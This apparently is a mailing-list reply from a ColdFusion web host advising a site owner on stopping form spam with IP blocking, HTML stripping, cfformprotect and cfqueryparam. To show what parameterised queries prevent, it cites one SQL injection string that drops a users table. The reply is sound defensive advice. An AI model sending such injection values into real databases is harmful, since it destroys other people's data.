There are a number of things you can do, and in fact i use all of these -

[A] Find out this person's ip address, and if the form is submitted
from that ip address, do nothing.  Don't give them any kind of
feedback at all.    That'll stop this current attack, but since these
idiots usually dart from one ip address to another, it's not enough to
fix the problem.  Only stop today's .  You can find out the ip address
by having you form submit #cgi.remote_addr# in a hidden field.

[B]  pass the form's submitted contents through a regex to eliminate
any html.  You can get all kinds of string manipulation scripts
through the library at cflib.org, including one to strip out any html

[C]  use cfformprotect, which (amongst other things) compares the
submission in this form wiht a database of other form submissions from
other sites, and identifying which ones are spam and which arent.
When it tells you this is spam, you just throw it away.   Dont tell
the spammer you're throwing it away, because that only helps them
refine their techniques.   Those buggers are agile enough as it is
without us giving them a helping hand.

You can get cfformprotect form http://www.riaforge.org/ .

[D]  while you're working in this area,  you should make sure you're
using <cfqueryparam if you're processing the form into your database.
I konw you havent described a SQL injection, but it's not a million
miles away from what you do describe.   There's ample documentation in
the ColdFusion docs about <cfqueryparam  and there have been quite a
few blog articles about it lately.   Google for cfqueryparam and
ColdFusion and you'll find them.  Using <cfqueryparam on every (and i
do mean EVERY) parameter you insert into the database, on every insert
or update if there is likely to be any user input going in that SQL
statement.    That ensures that you wont get anyone able to enter a
last name as 'Smith)';drop table users' or some such.

I started defending my sites from this kind of script when i had a
guestbook on a very low volume suddenly get 30,000 entries waiting for
editor approval, all with links to sites we might want to go and see,
just like yours has.  Using the techniques i described reduced the
flow from thousands a day to a more likely 3-4 a week on this little
site.

Hope this helps.

Cheers
Mike Kear
Windsor, NSW, Australia
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month